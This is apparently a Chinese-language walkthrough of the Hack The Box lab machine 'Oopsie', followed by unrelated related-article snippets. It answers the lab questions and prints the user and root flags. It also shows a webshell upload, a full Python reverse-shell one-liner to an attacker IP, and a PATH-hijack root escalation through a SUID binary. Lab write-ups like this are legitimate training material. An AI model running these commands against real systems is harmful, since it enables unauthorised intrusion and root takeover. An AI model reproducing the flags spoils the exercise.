[StartingPoint][Tier2]Oopsie

news2024/12/30 2:25:31

Task 1

With what kind of tool can intercept web traffic?

(哪种工具可以拦截web数据包)

proxy

Task 2

What is the path to the directory on the webserver that returns a login page?

(路径到返回登录页面的 Web 服务器目录是什么?)

image.png

/cdn-cgi/login

Task 3

What can be modified in Firefox to get access to the upload page?

(在 Firefox 中进行修改什么字段可以访问上传页面?)

cookie

Task 4

What is the access ID of the admin user?

(管理员的访问ID是多少?)

image.png

水平越权

image.png

34322

Task 5

On uploading a file, what directory does that file appear in on the server?

(上传文件后,该文件在服务器上出现在哪个目录?)

存在一个上传页面

image.png

上传一个正常图片,但是没有给路径。猜解上传路径

image.png

image.png

/uploads

Task 6

What is the file that contains the password that is shared with the robert user?

(包含与 robert 用户共享的密码的文件是什么?)

db.php

Task 7

What executible is run with the option “-group bugtracker” to identify all files owned by the bugtracker group?

(使用选项"-group bugtracker"运行的可执行文件用于识别所有由bugtracker组拥有的文件。)

find

Task 8

Regardless of which user starts running the bugtracker executable, what’s user privileges will use to run?

(无论哪个用户启动运行 bugtracker 可执行文件,它将使用哪个用户权限来运行?)

image.png

root

Task 9

What SUID stands for?

(SUID代表什么)

这个文件上设置了SUID

image.png

Set owner User ID

Task 10

What is the name of the executable being called in an insecure manner?

(bugtracker中哪个参数确认为不安全)

cat

必要步骤

方法A:一句话木马+python反弹shell

上传之后最好在uploads目录下新建一个xxx文件夹,将webshell放在这个xxx文件夹中,避免webshell被程序删除

image.png

image.png

用python来反弹shell

$ python3 -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("10.10.16.8",10032)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/bash", "-i"])'

注意了,一定一定要把webshell放到文件夹里面,这样才会稳定不被删

image.png

由于还不是交互式的shell,所以要用

$ SHELL=/bin/bash script -q /dev/null

image.png

方法B:一句话木马+SSH直接连接robert

image.png

提权

image.png

image.png

/usr/bin/bugtracker 可执行文件拥有 SUID 权限位。SUID (Set User ID) 权限是一种特殊的权限,允许用户在执行该文件时以文件所有者的权限而不是当前用户的权限来执行。因此,当用户 robert 执行 bugtracker 可执行文件时,该文件会以 bugtracker 组的权限来执行,而不是 robert 用户的权限。

此外bugtracker 组对于 /usr/bin/bugtracker 文件具有执行权限,并且该文件以 root 用户的权限执行。因此,当 robert 用户执行该文件时,他会以 root 用户的权限执行该文件。

image.png

当前路径变量

image.png

将环境变量设置到tmp目录,也就意味着执行任意程序时,当前shell优先从tmp目录找命令

robert@oopsie:/$ export PATH=/tmp:$PATH

robert@oopsie:/$ cd /tmp

robert@oopsie:/tmp$ echo '/bin/bash' > cat

root身份执行cat命令并且执行/bin/bash

robert@oopsie:/tmp$ chmod +x cat

image.png

再次执行 /usr/bin/bugtracker

image.png

Users Flag

$ cat /home/robert/user.txt

image.png

f2c74ee8db7983851ab2a96a44eb7981

Root Flag

image.png

af13b0bee69f8a877c3faf667f7beacf

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1579197.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

用vue.js写案例——ToDoList待办事项 (步骤和全码解析)

目录 一.准备工作 二.编写各个组件的页面结构 三.实现初始任务列表的渲染 四.新增任务 五.删除任务 六.展示未完成条数 七.切换状态-筛选数据 八.待办事项(全)代码 一.准备工作 在开发“ToDoList”案例之前,需要先完成一些准备工作&a…

MySQL-单行函数:数值函数、字符串函数、日期和时间函数、流程控制函数、加密与解密函数、MySQL信息函数、其他函数、单行函数练习

1.数值函数 1.1 基本的操作 SELECT ABS(-123),ABS(32),SIGN(-23),SIGN(43),PI(),CEIL(32.32),CEILING(-43.23),FLOOR(32.32), FLOOR(-43.23),MOD(12,5),12 MOD 5,12 % 5 FROM DUAL;1.2 取随机数 SELECT RAND(),RAND(),RAND(10),RAND(10),RAND(-1),RAND(-1) FROM DUAL;1.3 四…

计算机网络——40各个层次的安全性

各个层次的安全性 安全电子邮件 Alice需要发送机密的报文m给Bob Alice 产生随机的对称秘钥, K s K_s Ks​使用 K s K_s Ks​对报文进行加密(为了效率)对 K s K_s Ks​使用Bob的公钥进行加密发送 K s ( m ) K_s(m) Ks​(m)和 K B ( K S ) K…

如何使用群晖Synology Drive结合cpolar内网穿透实现同步Obsidian笔记文件

文章目录 一、简介软件特色演示: 二、使用免费群晖虚拟机搭建群晖Synology Drive服务,实现局域网同步1 安装并设置Synology Drive套件2 局域网内同步文件测试 三、内网穿透群晖Synology Drive,实现异地多端同步Windows 安装 Cpolar步骤&#…

视觉大模型--DAB-deter的深入理解

原理大家参考这篇文章,我主要是根据自己的理解和整个流程图以及代码进行对应,这样更有利于深入理解: 下图是解码器结构图,编码器没动和deter一样的 这张图片基本上说清了模型的结构和传递过程,红色代表切断梯度反向传…

线程池实践篇

文章目录 配置线程池参数定义参数实体bean配置线程池使用 配置线程池参数 定时任务线程池基础参数 # 定时任务线程池基础参数 task:pool:corePoolSize: 5 # 核心线程数maxPoolSize: 20 # 设置最大线程数keepAliveSeconds: 300 # 设置线程活跃时间,单位秒queueCapa…

如何快速开启一个项目-ApiHug - API design Copilot

ApiHug101-001开启篇 🤗 ApiHug {Postman|Swagger|Api...} 快↑ 准√ 省↓ GitHub - apihug/apihug.com: All abou the Apihug apihug.com: 有爱,有温度,有质量,有信任ApiHug - API design Copilot - IntelliJ IDEs Plugin |…

BMS基础之锂电池充放电特性

磷酸铁锂电池 它充电在3.3V以后,会有一个猛地增加,所以3.3v其实就是他的饱和电压,如果继续充电就会损坏电池,同理放电到一定程度电压就会急剧下降,过放也会损坏电池(充放电截止电压) 三元锂电…

MySQL数据库 数据库基本操作(四):表的增删查改(下)

1. 联合查询 注:联合查询是面试中的重点,只要考到sql,大多数情况下都考的是联合查询,而且联合查询也是我们学习中的难点. 1.1 笛卡尔积 在实际开发中,数据往往来自不同的表,所以要多表联合查询.多表查询是对多张表的数据笛卡尔积. 它们是两张表的各行数据通过全排列得到的. …

人工智能_大模型023_AssistantsAPI_01_OpenAI助手的创建_API的调用_生命周期管理---人工智能工作笔记0159

先来说一下一些问题: 尽量不要微调,很麻烦,而且效果需要自己不断的去测试. 如果文档中有图表,大量的图片去分析就不合适了. 是否用RAG搜索,这个可以这样来弄,首先去es库去搜能直接找到答案可以就不用去RAG检索了,也可以设置一个分,如果低于60分,那么就可以去进行RAG检索 微…

dinov2爆肝记

一、网址 https://github.com/facebookresearch/dinov2 二、配置 pip install -r requirements.txt -i https://mirrors.aliyun.com/pypi/simple/ 三、雷 cuml-cu11无法安装,因为他只能linux 但我发现,没他也行 四、代码 注意: 下面代码…

二叉树的遍历——BFS广度优先搜索

1、BinNode类的创建 (1)代码总览 ##(2)测试示例 2、二叉树的遍历 (1)图示 (2)代码总览 (3)测试示例

Datax,hbase与mysql数据相互同步

参考文章:datax mysql 和hbase的 相互导入 目录 0、软件版本说明 1、hbase数据同步至mysql 1.1、hbase数据 1.2、mysql数据 1.3、json脚本(hbase2mysql.json) 1.4、同步成功日志 2、mysql数据同步至hbase 1.1、hbase数据 1.2、mysql…

GD32零基础教程第一节(开发环境搭建及工程模板介绍)

文章目录 前言一、MDK keil5安装二、设备支持包安装三、CH340串口驱动安装四、STLINIK驱动安装五、工程风格介绍总结 前言 本篇文章正式带大家开始学习GD32F407VET6国产单片机的学习,国产单片机性能强,而且价格也便宜,下面就开始带大家来介绍…

C#互联网区域医学检验中心云LIS系统源码

云LIS联通四级(市、县、乡、村)检验服务网构建互联网检验服务新体系落地检验资源区域共享建设。云LIS系统是一种基于云计算技术的区域实验室信息管理系统,它的主要功能是管理实验室中的各种信息数据,包括样品数据、检测结果、仪器…

微信小程序-接入sse数据流并实现打字机效果( ChatGPT )

从流中获取的数据格式如下 小程序调用SSE接口 const requestTask wx.request({url: xxx, // 需要请求的接口地址enableChunked: true, // enableChunked必须为truemethod: "GET",timeout: 120000,success(res) {console.log(res.data)},fail: function (error) {//…

Golang | Leetcode Golang题解之第18题四数之和

题目&#xff1a; 题解&#xff1a; func fourSum(nums []int, target int) (quadruplets [][]int) {sort.Ints(nums)n : len(nums)for i : 0; i < n-3 && nums[i]nums[i1]nums[i2]nums[i3] < target; i {if i > 0 && nums[i] nums[i-1] || nums[i]…

今日科普:车祸导致颈部挥鞭样损伤,该怎样治疗

王先生因一次严重的车祸遭遇了颈部挥鞭样损伤。车祸后&#xff0c;他感到颈部和上肢持续性的刀割样疼痛&#xff0c;麻木不堪&#xff0c;严重影响了日常生活。王先生为了寻求疼痛缓解&#xff0c;来到了北京精诚博爱医院。经过详细的检查&#xff0c;医生决定为他实施颈交感射…

高端大气自适应全屏酷炫渐变卡片html源码图片切换特效html5源码导航引导网站源码

源码特点&#xff1a; 1&#xff1a;手工书写DIVCSS、代码精简无冗余。 2&#xff1a;自适应结构&#xff0c;全球先进技术&#xff0c;高端视觉体验。 3&#xff1a;SEO框架布局&#xff0c;栏目及文章页均可独立设置标题/关键词/描述。 4&#xff1a;附带测试数据、安装教程、…

少儿编程 2024年3月电子学会图形化编程等级考试Scratch二级真题解析(判断题)

2024年3月scratch编程等级考试二级真题 判断题&#xff08;共10题&#xff0c;每题2分&#xff0c;共20分&#xff09; 26、下列积木块运行结果为false 答案&#xff1a;错 考点分析&#xff1a;考查积木综合使用&#xff0c;重点考查逻辑或积木的使用&#xff0c;或运算是只…